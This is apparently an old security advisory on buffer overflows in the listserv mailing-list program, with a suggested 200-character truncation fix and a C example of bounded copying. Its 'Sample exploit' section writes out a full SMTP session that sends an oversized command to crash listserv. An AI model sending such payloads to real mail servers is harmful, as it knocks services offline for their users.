COMMAND
listserv
SYSTEMS AFFECTED
Systems running listserv that have this bug
PROBLEM
PLaGuEZ have found several buffer overflows in listserv, a widely
used mailing-list management program. By exploiting those
vulnerabilities, malicious hackers can remotely execute arbitrary
commands on the target machine: typically, placing backdoors on
the system or removing users' mail files, since listserv needs to
run sgid 'mail'.
In practice, though, the impact is harmless because it is almost
impossible to predict the parameters needed for the actual overflow,
i.e. the stack address and buffer size. The hole is still annoying
because it provides an efficient DoS attack: the attacker would
repeatedly connect to the target host and send an oversized buffer,
causing many segfaults on the target system.
User commands are sent directly in the body of the message,
where users can write whatever they want. The potential buffer
overflows are located in the functions that handle those commands
(the main() overflows are mostly harmless), e.g.: +file subscribe.c,
Sample exploit:
---------------
$ telnet xxxxxx.xxx 25
Trying 123.123.123.123...
Connected to 123.123.123.123
Escape character is '^]'.
220 xxxxxx.xxx ESMTP Sendmail 8.8.5/8.8.2; Fri, 20 Jun 1997 08:54:52 -0400
MAIL FROM: oooops@oooops.org
250 ooops ... Sender ok
RCPT TO: Listserv
250 Listserv ... Recipient ok
DATA
254 Enter mail, end with "." on a line by itself
From: noone
add aaaaaaaaaaaaaaa[...lotsa chars go here]aaaaaaaaaaaaa aaaaaa aaaaaa
.
250 RAFZ04965 Message accepted for delivery
QUIT
221 xxxxxxx.xxx closing connection
The listserv process handling this session will overflow its buffer and then crash.
SOLUTION
A possible one would be to use dynamic-length strings, or (easier
to implement) to strip each command down to its first 200 characters,
for example.
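Both fixes from SOLUTION side by side, as an added example in C that is not the advisory's or listserv's own code: a bounded copy that truncates a body line to 200 characters and reports the truncation, and a dynamic-length copy sized from the input. The names CMD_MAX, copy_command_bounded, copy_command_dynamic and exercise_bounded are assumed, and the oversized "add" line is constructed to mirror the sample session.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CMD_MAX 200   /* the 200-character cap proposed in SOLUTION (assumed name) */

/* Bounded copy: at most CMD_MAX bytes of a message-body line go into the
 * fixed buffer, always NUL-terminated. *truncated reports that the line
 * was oversized so the caller can log or reject it. Returns bytes copied. */
int copy_command_bounded(const char *line, char *out, size_t outsz, int *truncated) {
    size_t n = strlen(line);
    size_t limit = (outsz - 1 < CMD_MAX) ? outsz - 1 : CMD_MAX;
    *truncated = (n > limit);
    if (*truncated) n = limit;
    memcpy(out, line, n);
    out[n] = '\0';
    return (int)n;
}

/* Dynamic-length alternative from SOLUTION: the buffer is sized from the
 * input, so there is no fixed bound to overflow. Caller frees the result. */
char *copy_command_dynamic(const char *line) {
    size_t n = strlen(line);
    char *buf = malloc(n + 1);
    if (buf != NULL)
        memcpy(buf, line, n + 1);
    return buf;
}

/* Constructed input in the advisory's shape: "add " followed by 'a's up to
 * len bytes, run through the bounded copy. Returns the copied length. */
int exercise_bounded(size_t len, int *truncated) {
    char cmd[CMD_MAX + 1];
    char *line = malloc(len + 1);
    if (line == NULL) return -1;
    memset(line, 'a', len);
    memcpy(line, "add ", len < 4 ? len : 4);
    line[len] = '\0';
    int copied = copy_command_bounded(line, cmd, sizeof cmd, truncated);
    free(line);
    return copied;
}

int main(void) {
    int truncated;
    int n = exercise_bounded(5000, &truncated);
    printf("copied %d bytes, truncated=%d\n", n, truncated);
    return 0;
}
```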